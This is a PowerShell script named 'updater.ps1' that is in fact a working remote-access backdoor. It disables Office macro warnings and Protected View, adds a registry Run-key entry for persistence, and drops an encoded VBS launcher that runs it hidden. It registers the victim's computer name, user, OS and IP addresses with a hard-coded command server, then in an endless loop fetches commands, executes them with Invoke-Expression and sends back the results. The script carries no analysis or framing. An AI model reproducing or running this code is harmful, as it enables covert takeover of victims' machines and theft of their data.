updater.ps1

1. $Excel = New-Object -ComObject Excel.Application
2. $ExcelVersion = $Excel.Version
3. for($i=10; $i -le 20; $i++){
4. New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$i.0\excel\Security" -Name AccessVBOM -PropertyType DWORD -Value 1 -Force
5. New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$i.0\excel\Security" -Name VBAWarnings -PropertyType DWORD -Value 1 -Force
6. New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$i.0\excel\Security\ProtectedView" -Name DisableAttachementsInPV -Value 1 -PropertyType DWORD -Force
7. New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$i.0\excel\Security\ProtectedView" -Name DisableInternetFilesInPV -Value 1 -PropertyType DWORD -Force
8. New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$i.0\excel\Security\ProtectedView" -Name DisableUnsafeLocationsInPV -Value 1 -PropertyType DWORD -Force
9. }
10. for($i=10; $i -le 20; $i++){
11. New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$i.0\word\Security" -Name AccessVBOM -Value 1 -PropertyType DWORD -Force
12. New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$i.0\word\Security" -Name VBAWarnings -Value 1 -PropertyType DWORD -Force
13. New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$i.0\word\Security\ProtectedView" -Name DisableAttachementsInPV -Value 1 -PropertyType DWORD -Force
14. New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$i.0\word\Security\ProtectedView" -Name DisableInternetFilesInPV -Value 1 -PropertyType DWORD -Force
15. New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$i.0\word\Security\ProtectedView" -Name DisableUnsafeLocationsInPV -Value 1 -PropertyType DWORD -Force
16. }
17. New-ItemProperty -Path HKCU:SOFTWARE\Microsoft\Windows\CurrentVersion\Run -Name Updater -PropertyType String -Value 'C:\Users\Public\Documents\conf.vbs' -Force
18. $x='RGltIG9ialNoZWxsClNldCBvYmpTaGVsbCA9IFdTY3JpcHQuQ3JlYXRlT2JqZWN0KCJXU2NyaXB0LlNoZWxsIikKY29tbWFuZCA9ICJwb3dlcnNoZWxsLmV4ZSAtV2luZG93U3R5bGUgaGlkZGVuIC1FeGVjdXRpb25Qb2xpY3kgQnlwYXNzIC1ub2xvZ28gLW5vcHJvZmlsZSAtZmlsZSBDOlxVc2Vyc1xQdWJsaWNcRG9jdW1lbnRzXFVwZGF0ZXIucHMxIgpvYmpTaGVsbC5SdW4gY29tbWFuZCwwClNldCBvYmpTaGVsbCA9IE5vdGhpbmcK'
19. [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($x)) | Out-File C:\Users\Public\Documents\conf.vbs
20.  
21. $config = @{'api'= 'http://138.201.75.227/v2/'; 'storagePath'= 'C:\Users\Public\Documents'; 'chunkSize'=1024; 'retryCount'=2}
22. function encode
23. {
24. param([string] $text)
25. $bytes = [System.Text.Encoding]::UTF8.GetBytes($text)
26. [Convert]::ToBase64String($bytes)
27. }
28.  
29. function decode
30. {
31. param([string] $code)
32. [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($code))
33. }
34.  
35.  
36. function getIps
37. {
38. $ips=""
39. gwmi Win32_NetworkAdapterConfiguration -Filter "IPEnabled=True" | where{$_.IPAddress[0] -NotLike '169*'} | % {$ips = $ips + "-"+ $_.IPAddress[0]}
40. return $ips.subString(1)
41. }
42.  
43. function eval
44. {
45. param([string] $expression)
46. try {
47. Invoke-Expression $expression
48. } catch [System.SystemException] {
49. return $false
50. }
51. }
52.  
53. function httpGet
54. {
55. param([string] $url)
56. try {
57. return (New-Object System.Net.WebClient).DownloadString("$($config['api'])$($url)")
58. }
59. catch [Net.WebException] {
60. return $_.Exception.Message
61. }
62. }
63.  
64. function sendResult
65. {
66. param([string] $key, [string] $cmdId, [string]$result)
67. $prefix = "?action=saveResult&id=$key&cmd=$cmdId"
68. $chunks = [math]::floor($result.Length / $config['chunkSize'])
69. if($chunks -eq 0){
70. httpGet "$prefix&res=$result"
71. }else{
72. $counter = 0;
73. for($j=0; $j -le $chunks; ++$j){
74. $httpResult=''
75. if($j -eq $chunks){
76. $chunk = $result.Substring($j*$config['chunkSize'])
77. $httpResult = httpGet "$prefix&chunk=last&res=$chunk"
78. }else{
79. $chunk = $result.Substring($j*$config['chunkSize'],$config['chunkSize'])
80. $httpResult = httpGet "$prefix&chunk=$j&res=$chunk"
81. }
82. if($httpResult -eq 'OK'){continue}
83. ++$counter
84. --$j
85. if($counter -ge $config['retryCount']){break}
86. Start-Sleep -s 5
87. }
88. }
89. }
90.  
91. function getKey
92. {
93. $keyPath = "$($config['storagePath'])\$($env:username).key"
94. if((Test-Path $keyPath) -eq $true){
95. $key = Get-Content $keyPath
96. if($key -match "^\d+$"){
97. return $key
98. }
99. }
100. $os = (Get-WmiObject Win32_OperatingSystem).Name
101. $os = $os.Split('{|}', [System.StringSplitOptions]::RemoveEmptyEntries)
102. $os ="$((Get-WmiObject Win32_OperatingSystem).OSArchitecture)|$((Get-WmiObject Win32_OperatingSystem).Version)|$($os[0])|$($os[1])"
103. $data = "$($env:computername)::$($env:username)::$($os)::$(getIPs)"
104. $data = encode $data
105. $id = httpGet "?action=register&data=$($data)"
106. if($id.Length -gt 0){
107. if($id -match "^\d+$"){
108. Set-Content $keyPath $id
109. return $id
110. }
111. }
112. return $false
113. }
114.  
115. function getCommand($key)
116. {
117. $commands = httpGet -url "?action=getCommand&id=$key"
118. if($commands.Length -gt 4){
119. $parts = $commands.Split('{::}', [System.StringSplitOptions]::RemoveEmptyEntries)
120. $id = $parts[0]
121. $cmd = decode $parts[1]
122. $res = ((eval $cmd) | Out-String)
123. $res = $res -replace ' {4,}', ' '
124. $res = $res -replace '\-{4,}', '----'
125. $res = encode $res
126. sendResult $key $id $res
127. return $true
128. }
129. return $false
130. }
131.  
132.  
133. while($true){
134. $key = getKey
135. if($key -eq $false){start-sleep -Seconds 120}
136. else{break}
137. }
138. while ($true){
139. getCommand $key
140. start-sleep -Seconds 120
141. }